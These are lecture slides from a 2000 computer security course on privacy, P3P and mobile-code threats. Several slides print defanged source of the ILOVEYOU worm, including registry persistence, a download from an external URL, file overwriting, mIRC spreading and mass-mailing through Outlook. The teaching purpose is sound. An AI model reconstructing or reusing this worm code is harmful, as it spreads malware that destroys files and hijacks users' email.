Lecture 4, 20-771: Computer Security, Fall 2000 1 20-771: Computer Security Lecture 4: Active Content & Privacy 1 Robert Thibadeau School of Computer.

Lecture 4, 20-771: Computer Security, Fall 2000 1

20-771: Computer SecurityLecture 4: Active Content &

Privacy 1

Robert Thibadeau

School of Computer Science

Carnegie Mellon University

Institute for eCommerce, Fall 2000


Today’s lecture

• Privacy I

• Break (10 min)

• Active Content

• Quiz


This Week

Chapters 3,4,5 WS

Homework

Quiz Today


X.509v3 Certificate-----BEGIN CERTIFICATE-----MIIDNjCCAp+gAwIBAgIBATANBgkqhkiG9w0BAQQFADCBqTELMAkGA1UEBhMCWFkxFTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25ha2UgVG93bjEXMBUGA1UEChMOU25ha2UgT2lsLCBMdGQxHjAcBgNVBAsTFUNlcnRpZmljYXRlIEF1dGhvcml0eTEVMBMGA1UEAxMMU25ha2UgT2lsIENBMR4wHAYJKoZIhvcNAQkBFg9jYUBzbmFrZW9pbC5kb20wHhcNOTkxMDIxMTgyMTUxWhcNMDExMDIwMTgyMTUxWjCBpzELMAkGA1UEBhMCWFkxFTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25ha2UgVG93bjEXMBUGA1UEChMOU25ha2UgT2lsLCBMdGQxFzAVBgNVBAsTDldlYnNlcnZlciBUZWFtMRkwFwYDVQQDExB3d3cuc25ha2VvaWwuZG9tMR8wHQYJKoZIhvcNAQkBFhB3d3dAc25ha2VvaWwuZG9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC554Ro+VH0dJONqljPBW+C72MDNGNy9eXnzejXrczsHs3Pc92Vaat6CpIEEGueyG29xagb1o7Gj2KRgpVYcmdx6tHd2JkFW5BcFVfWXL42PV4rf9ziYon8jWsbK2aE+L6hCtcbxdbHOGZdSIWZJwc/1Vs70S/7ImW+Zds8YEFiAwIDAQABo24wbDAbBgNVHREEFDASgRB3d3dAc25ha2VvaWwuZG9tMDoGCWCGSAGG+EIBDQQtFittb2Rfc3NsIGdlbmVyYXRlZCBjdXN0b20gc2VydmVyIGNlcnRpZmljYXRlMBEGCWCGSAGG+EIBAQQEAwIGQDANBgkqhkiG9w0BAQQFAAOBgQB6MRsYGTXUR53/nTkRDQlBdgCcnhy3hErfmPNl/Or5jWOmuufeIXqCvM6dK7kW/KBboui4pffIKUVafLUMdARVV6BpIGMI5LmVFK3sgwuJ01v/90hCt4kTWoT8YHbBLtQh7PzWgJoBAY7MJmjSguYCRt91sU4Ks0dfWsdItkw4uQ==-----END CERTIFICATE-----


X.509v3 Opened!Certificate: Data: Version: 3 (0x2) Serial Number: 1 (0x1) Signature Algorithm: md5WithRSAEncryption Issuer: C=XY, ST=Snake Desert, L=Snake Town, O=Snake Oil,

Ltd, OU=Certificate Authority, CN=Snake Oil CA/[email protected]

Validity Not Before: Oct 21 18:21:51 1999 GMT Not After : Oct 20 18:21:51 2001 GMT Subject: C=XY, ST=Snake Desert, L=Snake Town, O=Snake Oil,

Ltd, OU=Webserver Team, CN=www.snakeoil.dom/[email protected]

Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit):


509 Opened 2KEY : 00:b9:e7:84:68:f9:51:f4:74:93:8d:aa:58:cf:05:

6f:82:ef:63:03:34:63:72:f5:e5:e7:cd:e8:d7:ad: cc:ec:1e:cd:cf:73:dd:95:69:ab:7a:0a:92:04:10: 6b:9e:c8:6d:bd:c5:a8:1b:d6:8e:c6:8f:62:91:82: 95:58:72:67:71:ea:d1:dd:d8:99:05:5b:90:5c:15: 57:d6:5c:be:36:3d:5e:2b:7f:dc:e2:62:89:fc:8d: 6b:1b:2b:66:84:f8:be:a1:0a:d7:1b:c5:d6:c7:38: 66:5d:48:85:99:27:07:3f:d5:5b:3b:d1:2f:fb:22: 65:be:65:db:3c:60:41:62:03 Exponent: 65537 (0x10001)

X509v3 extensions: X509v3 Subject Alternative Name: email:[email protected] Netscape Comment: mod_ssl generated custom server certificate Netscape Cert Type: SSL Server Signature Algorithm: md5WithRSAEncryption

7a:31:1b:18:19:35:d4:47:9d:ff:9d:39:11:0d:09:41:76:00: 9c:9e:1c:b7:84:4a:df:98:f3:65:fc:ea:f9:8d:63:a6:ba:e7: de:21:7a:82:bc:ce:9d:2b:b9:16:fc:a0:5b:a2:e8:b8:a5:f7: c8:29:45:5a:7c:b5:0c:74:04:55:57:a0:69:20:63:08:e4:b9: 95:14:ad:ec:83:0b:89:d3:5b:ff:f7:48:42:b7:89:13:5a:84: fc:60:76:c1:2e:d4:21:ec:fc:d6:80:9a:01:01:8e:cc:26:68: d2:82:e6:02:46:df:75:b1:4e:0a:b3:47:5f:5a:c7:48:b6:4c: 38:b9


Privacy : Introduction

• Privacy does not have the honor of having an accepted technical meaning

– PII : Personally Identifiable Information

– Privacy as insuring against the misuse of information

– Assuring that data is hidden

• Interesting Government Policy Documents– http://www.whitehouse.gov/WH/New/Commerce/read.html

– http://www.whitehouse.gov/WH/New/html/20000501_4.html

• Sky is falling syndrome:– http://www.privacylaw.net/ ..among many others


The Simple Cases

• Keep it completely secret so privacy is assured. (Crytophilia)

• Make it completely public so privacy is not a problem. (Jeffersonism)

• Personally Identifiable Information, PII, (your name, address, and credit card number) is all that needs to be protected. (CreditCarditis)

• Not good enough.

• Need to tell some things to some people but don’t want those things misused.


Sky is falling Syndrome

• Considering history, FBI e-mail snooping raises red flag

• Five biggest threats to online privacy

• Privacy Group Wants Speedier Carnivore Disclosure

• FBI To Release E-mail Documents

• Verizon Site Exposed Customer Data

• Nosy Bosses Face Limits on E-Mail Spying--Workers Gain New Freedoms


Sky is Falling

• Those guys are bad guys that are taking advantage of anything I disclose and anything they can find out.

• Doubleclick and cookies– Cookie is employed to keep track of sites you visit.

– Still, ongoing. Very hard to defeat as a practical matter.

– Very hard not to visit a place.

– Bypasses proxy services.


Silent Information Thieves!Access Log - My NeXT Machine in my office (BSD 4.2) (/private/adm/network)May 9 03:23:05 nageela ftpd[2184]: refused connect from 209.233.224.173May 9 05:21:48 nageela ftpd[2203]: gethostbyname(adsl-209-233-224-173.pacbell.net): lookup failureMay 9 05:21:48 nageela ftpd[2203]: refused connect from 209.233.224.173May 10 06:32:51 nageela ftpd[2509]: connect from vc3-49d.dsl.indra.comMay 10 06:50:45 nageela ftpd[2512]: connect from vc3-49d.dsl.indra.comMay 10 06:50:46 nageela ftpd[2513]: connect from vc3-49d.dsl.indra.comMay 13 07:11:42 nageela ftpd[4267]: connect from bilbo.ee.ualberta.caMay 16 19:46:24 nageela telnetd[5775]: connect from 209.208.174.4May 16 19:46:24 nageela ftpd[5776]: connect from 209.208.174.4May 16 19:46:24 nageela ftpd[5774]: connect from 209.208.174.4May 16 19:46:24 nageela telnetd[5777]: connect from 209.208.174.4May 21 03:06:53 nageela telnetd[8119]: connect from hermes.globalwebdesign.comMay 21 03:06:54 nageela telnetd[8120]: connect from hermes.globalwebdesign.comMay 21 03:06:54 nageela ftpd[8121]: connect from hermes.globalwebdesign.comMay 23 07:06:29 nageela telnetd[9035]: connect from spaceace.vi.ri.cmu.eduMay 24 01:55:35 nageela ftpd[9277]: connect from 208.135.135.76May 28 05:02:38 nageela ftpd[11282]: connect from cx884963-a.chnd1.az.home.comMay 29 02:16:38 nageela ftpd[11749]: connect from 194.204.246.130May 30 01:48:50 nageela ftpd[12032]: connect from 140.123.224.37May 30 02:54:36 nageela ftpd[12051]: connect from u5611a.dorm.ccu.edu.twJun 3 14:09:47 nageela ftpd[14281]: connect from cr908045-a.ym1.on.wave.home.comJun 3 20:30:04 nageela ftpd[14425]: connect from 193.40.7.69Jun 3 20:31:06 nageela ftpd[14426]: connect from 193.40.7.69Jun 7 13:09:40 nageela ftpd[15728]: connect from garfield.EBICom.NetJun 7 13:09:42 nageela ftpd[15729]: connect from garfield.EBICom.NetJun 8 07:44:10 nageela ftpd[16109]: connect from dt010n13.san.rr.comJun 27 16:58:29 nageela ftpd[1482]: connect from 204.116.83.2Jun 30 10:14:05 nageela telnetd[2846]: connect from dialup-wdc24655.mpx.com.auJun 30 10:14:12 nageela telnetd[2847]: connect from dialup-wdc24655.mpx.com.auJul 6 10:55:49 nageela telnetd[5356]: connect from UX6.SP.CS.CMU.EDUJul 9 20:56:41 nageela telnetd[6925]: connect from mozart.wisdom.weizmann.ac.ilJul 9 20:56:41 nageela ftpd[6926]: connect from mozart.wisdom.weizmann.ac.ilJul 9 20:56:41 nageela telnetd[6927]: connect from mozart.wisdom.weizmann.ac.ilJul 10 08:50:42 nageela telnetd[7062]: connect from 200.230.62.36Jul 10 08:50:43 nageela ftpd[7065]: connect from 200.230.62.36Jul 10 08:50:43 nageela telnetd[7066]: connect from 200.230.62.36Jul 13 00:56:01 nageela telnetd[7982]: connect from c64886-b.lakwod3.co.home.comJul 25 05:47:31 nageela ftpd[12972]: connect from 208.240.246.6Jul 25 07:40:20 nageela ftpd[12990]: connect from moonbeam.connriver.netJul 25 07:42:54 nageela ftpd[12991]: connect from moonbeam.connriver.net Jul 25 13:45:48 nageela ftpd[13061]: connect from aigw3.aici.comJul 25 13:45:48 nageela telnetd[13062]: connect from aigw3.aici.comJul 31 09:02:25 nageela ftpd[1146]: connect from 210.223.79.200Jul 31 09:02:26 nageela ftpd[1147]: connect from 210.223.79.200Aug 1 02:07:58 nageela ftpd[1364]: connect from bambina.idnet.deAug 1 02:17:18 nageela ftpd[1367]: connect from bambina.idnet.deAug 2 05:56:47 nageela telnetd[1713]: connect from c64886-b.lakwod3.co.home.comAug 5 23:05:53 nageela ftpd[3643]: connect from www.econ.cau.ac.krAug 9 19:56:48 nageela ftpd[5362]: connect from 216.47.244.7Aug 9 20:19:28 nageela ftpd[5368]: connect from 216.47.244.7Aug 16 02:31:45 nageela ftpd[8304]: connect from i44pc20.info.uni-karlsruhe.deAug 16 02:31:45 nageela ftpd[8305]: connect from i44pc20.info.uni-karlsruhe.deAug 20 22:40:53 nageela telnetd[11114]: connect from kumasi.frontec-uk.comAug 22 22:51:33 nageela ftpd[11716]: connect from cathay-usa.comAug 22 22:51:34 nageela ftpd[11717]: connect from cathay-usa.comAug 23 22:35:31 nageela telnetd[12307]: connect from 209.135.0.220Aug 23 22:36:34 nageela telnetd[12308]: connect from 209.135.0.220Aug 28 21:20:58 nageela ftpd[14980]: connect from dl015.mii.zaz.com.brSep 2 18:30:44 nageela ftpd[18062]: connect from cx388792-a.msnv1.occa.home.comSep 2 18:39:43 nageela ftpd[18063]: connect from cx388792-a.msnv1.occa.home.comSep 7 21:26:17 nageela telnetd[20629]: connect from 198.189.134.199 Sep 8 15:02:48 nageela ftpd[21173]: connect from rht.vi.ri.cmu.edu Transfer interrupted! face="Arial">Sep 10 16:12:43 nageela ftpd[22555]: connect from rht.vi.ri.cmu.edu Sep 10 16:21:19 nageela ftpd[22566]: connect from nageela.vi.ri.cmu.edu Sep 10 16:30:14 nageela ftpd[22607]: connect from nageela.vi.ri.cmu.edu Sep 10 16:31:47 nageela ftpd[22618]: connect from nageela.vi.ri.cmu.edu Sep 10 16:39:09 nageela ftpd[22639]: connect from DOLLAR.ECOM.CMU.EDU Sep 10 16:39:27 nageela telnetd[22640]: connect from DOLLAR.ECOM.CMU.EDU Sep 10 16:41:01 nageela ftpd[22648]: connect from nageela.vi.ri.cmu.edu Sep 10 16:42:20 nageela ftpd[22650]: refused connect from DOLLAR.ECOM.CMU.EDU Sep 10 16:42:28 nageela telnetd[22651]: refused connect from DOLLAR.ECOM.CMU.EDU Sep 10 17:11:37 nageela ftpd[22695]: connect from rht.vi.ri.cmu.edu Sep 13 11:07:01 nageela telnetd[23665]: host name/address mismatch: 192.76.184.141 != lasagna.visus.com Sep 13 11:07:01 nageela telnetd[23665]: refused connect from 192.76.184.141 Sep 13 11:07:20 nageela ftpd[23666]: host name/address mismatch: 192.76.184.141 != lasagna.visus.com Sep 13 11:07:20 nageela ftpd[23666]: refused connect from 192.76.184.141 Sep 14 09:10:08 nageela ftpd[24182]: connect from rht.vi.ri.cmu.edu Sep 14 14:02:22 nageela ftpd[24400]: connect from rht.vi.ri.cmu.edu Sep 15 02:04:05 nageela ftpd[24716]: refused connect from ATBRILL.REM.CMU.EDU Sep 15 04:36:43 nageela ftpd[24757]: connect from jelly.visus.com


An Unsolvable Problem?Privacy is clearly out of control on the

InternetThere is theft of information all over the place, all the

time. The controls are not disclosed and would be ridiculous if examined carefully.

Privacy Policies are ridiculous since they are one-way ultimatums trying to be “reasonable”

Restricting privacy to considering your name and address is ridiculous because there are lots of ways to identify you.

Personally Identifiable Information is ridiculous because that cannot be specified perfectly.


Authorization

• Limit actions to those that are authorized to take those actions.

– This seems OK since they can be held responsible for this.

• Limit use of information to those that are authorized to use it.

– Protects privacy if there is an “understanding” not to misuse.

– Do you believe this?


Privacy

• It is not an information problem– PII protection is ill-defined

• It is a problem with the use of information– Information misuse is the problem

– Information misuse is ill-defined

• It makes more sense to address the ill-defined, but vastly more pervasive and appropriate, problem of information misuse than the ill-defined problem of personally identifiable information.


Privacy Modelled after the Non-Disclosure Agreement

• What is going to be disclosed.

• For what purpose.

• Both parties agree to what information is disclosed

• Both parties agree to what use this information is put


Privacy Requires

• Legally binding default agreements– Like Copyright or other Law (You can’t read somebody

else’s mail).

• Agreements on what information is disclosed and what use the information is put.

– Agreement is two sided.

– It is not reasonable to assume that a one-sided agreement preserves privacy.


www.w3.org/p3pPlatform for Privacy Preferences

• The legal entity making the representation.

• The site provides access to various kinds of information.

• Data practices applied to data.

• Types of data that a site collects

• Intended uses of the data.

• Purpose of data collection or purpose of uses of data.

• Retention policy on data.

• Dispute Resolution procedures (e.g., third party, customer support).

• Remedy (e.g., cash payment)

• Explanation about why the suggested practice may be valuable in a particular instance even if the user would not normally allow the practice.


Nature of P3P “Agreement”

• Client goes to Server

• Server issues ultimatum about Privacy Policy

• Client can either accept or leave.

• Methods exist for notifying User that a Privacy Policy is in violation of his Privacy Preferences, so as to allow User to change his mind.

– APPEL : Rules that say, ACCEPT, REJECT, INFORM, WARN (user).


PSP Agreement is NOT an Agreement

• It can be repudiated (I didn’t see that, my browser wasn’t working)

• There is no confirmation among the two parties of an agreement. The server must simply assume the user has agreed.

• User has no opportunity to pose a different privacy policy to server.

• User is not bound by any agreement not to disclose or misuse.

• Alternative means of passing information not covered (e.g., email?) – no explicit scope.


Two Sides

• Buyer wants things without exposing any information he discloses to any use other than what they MUST have to give him the things he wants. (Cryptophilia)

• Seller wants to know as much about Buyer as possible because this gives him control over Buyers and therefore revenue. He can also sell this information (e.g., to advertisers). He wants unrestricted use of this information.

• BUT, Buyers now collect information on Sellers and misuse that (The Sky is Falling.)

• An Agreement is bilateral. The Internet can make possible agreements public and thereby expose both Sellers and Buyers to violations.


More Rational Privacy Scenario

• TRUSTe violates privacy agreement and uses cookies to track personally identifiable information.

• Reporter violates privacy agreement and reports publicly on TRUSTe violation without first contacting the TRUSTe webmaster.

• Now we are talking trust!


Next: Active Content

• Think about the world if Active Content had privacy agreements around it.


Break!


Active ContentAlso called “Mobile Code”

• Web Browsers can download and execute software automatically without warning.

• Software may damage user’s system or violate privacy.

• Administrator: This can tunnel through firewall protections.

• Case: U.S. Government came close, within two weeks, to an executive order that shut down all “mobile code” in the government.

• Failed: This would “dumb down” Federal employees and make the Government Stupid.


Threats from Mobile Code

• Purposefully malicious– Moldovan Connection

» Sexygirls.com and Erotic2000.com

» Downloaded and ran viewer, program hung up phone and made long distance call to Moldovan, $2 per minute.

» User taken to site stayed around without knowing charge.

– “I Love You” Worm : probable accidental escape.

• Big programs have bugs– Other people will exploit those bugs


Traditional Threats

• Trojan Horses : Very Serious. Often used for spying. (e.g., change the login program to create a back door).

• Virus : Code that replicates itself and inserts into an executable program or file.

• Macro viruses : Viruses written in the macro language of a word processor, or other trusted program. Becomes infectious on other documents.

• Rabbits : Programs that make many copies of themselves. Standalone. Denial of Service.

• Worms : Similar but spread across network.


Many Many Threats

• I Love You– Opening email that says “I Love You” from a person you

know: Trojan Horse

– Reads your address book : Privacy Violation

– Deletes image files : Havoc

– Across Network : Worm

• Demonstrated– Microsoft Outlook could execute seriously destructive

and intrusive active content without control of user.


I Love You Code(virus has been killed)

had name ‘vxryfunny.vbs’

rxm barok -lovxlxttxr(vbx) <i hatx go to school>

rxm by: spydxr / [email protected] / @GRAMMxRSoft Group / Manila,Philippinxs

dim fso,dirsystxm,dirwin,dirtxmp,filx,vbscopy,dow

Sxt fso = CrxatxObj("Scripting.FilxSystxmObj")

sxt filx = fso.OpxnTxxt(WScript.ScriptFullnamx,1)

vbscopy=filx.RxadAll


I Love You Code 2

main()sxt wscr=CrxatxObj("WScript.Shxll")rr=wscr.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\Windows

Scripting Host\Sxttings\Timxout")wscr.RxgWritx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\Windows

Scripting Host\Sxttings\Timxout",0,"RxG_DWORD"Sxt dirwin = fso.GxtSpxcialFoldxr(0)Sxt dirsystxm = fso.GxtSpxcialFoldxr(1)Sxt dirtxmp = fso.GxtSpxcialFoldxr(2)Sxt c = fso.GxtFilx(WScript.ScriptFullNamx)c.Copy(dirsystxm&"\MSKxrnxl32.vbs")c.Copy(dirwin&"\Win32DLL.vbs")c.Copy(dirsystxm&"\Vxry Funny.vbs")rxgruns()html()sprxadtoxmail()listadriv()


I Love You Code 3 : rxgruns()

sub rxgruns()rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\

CurrxntVxrsion\Run\MSKxrnxl32",dirsystxm&"\MSKxrnxl32.vbs"rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\

CurrxntVxrsion\RunSxrvicxs\Win32DLL",dirwin&"\Win32DLL.vbs"Dn=rxggxt("HKxY_CURRxNT_USxR\Softwarx\Microsoft\Intxrnxt

xxplorxr\Download Dirory")rxgcrxatx "HKCU\Softwarx\Microsoft\Intxrnxt xxplorxr\Main\Start

Pagx","http://www.skyinxt.nxt/~young1s/HJKhjnwxrhjkxcvytwxrtnMTFwxtrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.xxx"

rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\Run\WIN-BUGSFIX",downrxad&"\WIN-BUGSFIX.xxx"

rxgcrxatx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\Intxrnxt xxplorxr\Main\Start Pagx","about:blank"

xnd sub


I Love You Code 4Listing the Drives on Your Machine

(there were several of these utility-type spies)

sub listadriv

Dim d,dc,s

Sxt dc = fso.Drivxs

For xach d in dc

If d.DrivxTypx = 2 or d.DrivxTypx=3 Thxn

foldxrlist(d.path&"\")

xnd if

Nxxt

listadriv = s

xnd sub


I Love You Code 5re-writing jpg files

sub inffilxs(foldxrspxc) sxt f = fso.GxtFoldxr(foldxrspxc)sxt fc = f.Filxsfor xach f1 in fcxxt=fso.GxtxxtxnsionNamx(f1.path)if (xxt="vbs") or (xxt="vbx") thxnsxt ap=fso.OpxnTxxtFilx(f1.path,2,trux)ap.writx vbscopyap.closxxlsxif(xxt="jpg") or (xxt="jpxg") thxnsxt ap=fso.OpxnTxxtFilx(f1.path,2,trux)ap.writx vbscopyap.closx (did same for mp3 files and others)


if (xq<>foldxrspxc) thxnif (s="mirc32.xxx") or (s="mlink32.xxx") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") thxnsxt scriptini=fso.CrxatxTxxtFilx(foldxrspxc&"\script.ini")scriptini.WritxLinx "[script]"scriptini.WritxLinx ";mIRC Script"scriptini.WritxLinx "; Plxasx dont xdit this script... mIRC will corrupt, if mIRC will"scriptini.WritxLinx " corrupt... WINDOWS will aff and will not run corrly. thanks"scriptini.WritxLinx ";"scriptini.WritxLinx ";Khalxd Mardam-Bxy"scriptini.WritxLinx ";http://www.mirc.com"scriptini.WritxLinx ";"scriptini.WritxLinx "n0=on 1:JOIN:#:{"scriptini.WritxLinx "n1= /if ( $nick == $mx ) { halt }"scriptini.WritxLinx "n2= /.dcc sxnd $nick "&dirsystxm&"\Vxry Funny.HTM"scriptini.WritxLinx "n3=}"scriptini.closxxq=foldxrspxcnxxt xnd sub

I Love You Code 6 : .ini


if (xq<>foldxrspxc) thxnif (s="mirc32.xxx") or (s="mlink32.xxx") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") thxnsxt scriptini=fso.CrxatxTxxtFilx(foldxrspxc&"\script.ini")scriptini.WritxLinx "[script]"scriptini.WritxLinx ";mIRC Script"scriptini.WritxLinx "; Plxasx dont xdit this script... mIRC will corrupt, if mIRC will"scriptini.WritxLinx " corrupt... WINDOWS will aff and will not run corrly. thanks"scriptini.WritxLinx ";"scriptini.WritxLinx ";Khalxd Mardam-Bxy"scriptini.WritxLinx ";http://www.mirc.com"scriptini.WritxLinx ";"scriptini.WritxLinx "n0=on 1:JOIN:#:{"scriptini.WritxLinx "n1= /if ( $nick == $mx ) { halt }"scriptini.WritxLinx "n2= /.dcc sxnd $nick "&dirsystxm&"\Vxry Funny.HTM"scriptini.WritxLinx "n3=}"scriptini.closxxq=foldxrspxcnxxt xnd sub

I Love You Code 7 : .ini file


sub sprxadtoxmail()sxt rxgxdit=CrxatxObj("WScript.Shxll")sxt out=WScript.CrxatxObj("Outlook.Application")sxt mapi=out.GxtNamxSpacx("MAPI")for ctrlists=1 to mapi.AddrxssLists.Countsxt a=mapi.AddrxssLists(ctrlists)rxgv=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"&a)if (int(a.Addrxssxntrixs.Count)>int(rxgv)) thxnfor ctrxntrixs=1 to a.Addrxssxntrixs.Countmalxad=a.Addrxssxntrixs(x)rxgad=""rxgad=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"&malxad)if (rxgad="") thxnsxt malx=out.CrxatxItxm(0)malx.Rxcipixnts.Add(malxad)malx.Subj = "fwd: Jokx"malx.Body = vbcrlf&""malx.Attachmxnts.Add(dirsystxm&"\Vxry Funny.vbs")malx.SxndSxt out=NothingSxt mapi=Nothingxnd sub

I Love You Code 8 : spread mail


Silent Attacks

• I should be obvious it would not be hard to create a silent worm that sends mail on file systems, files, and address lists (and also all your mail on your local machine).

• We can do this with your web browser too …


Virus Checkers

• Pattern match in secret ways to find viral “fingerprints”

• Use a technique called “finite state automata” to create very fast search over your files.

• If virus is not known already, it will do damage.

• Finding silent viruses may be hard.


Authenticode System

• Windows 2000• Running code requires a X.509v3 Certificate

with an approved CA• Personal Publishers (ID with Credit Bureau)• Commercial Publishers (Articles of

Incorporation)• Sign a pledge: “reasonable care consistent

with prevailing industry standards to keep code free from viruses, malicious code, and other dta that may damage, misappropriate, or otherwise interfere with a third party’s operations.”

• Remedy: Revoke your Certificate (HA!)


Steps you can Take

• Don’t run as administrator/root

• Use Virus Checkers (but watch those companies!!!)

• Backup Often

• Verify the integrity and authenticity of software.

– A very good idea is to not accept active code without a certificate that guarantees the author can be found!

– Same principle as “mutually assured destruction” or “keep the pilot on the plane!” He won’t hurt you if you can hurt him.


Finally,

• Even if Adobe is the authentic code writer/distributor, get them to agree to your privacy!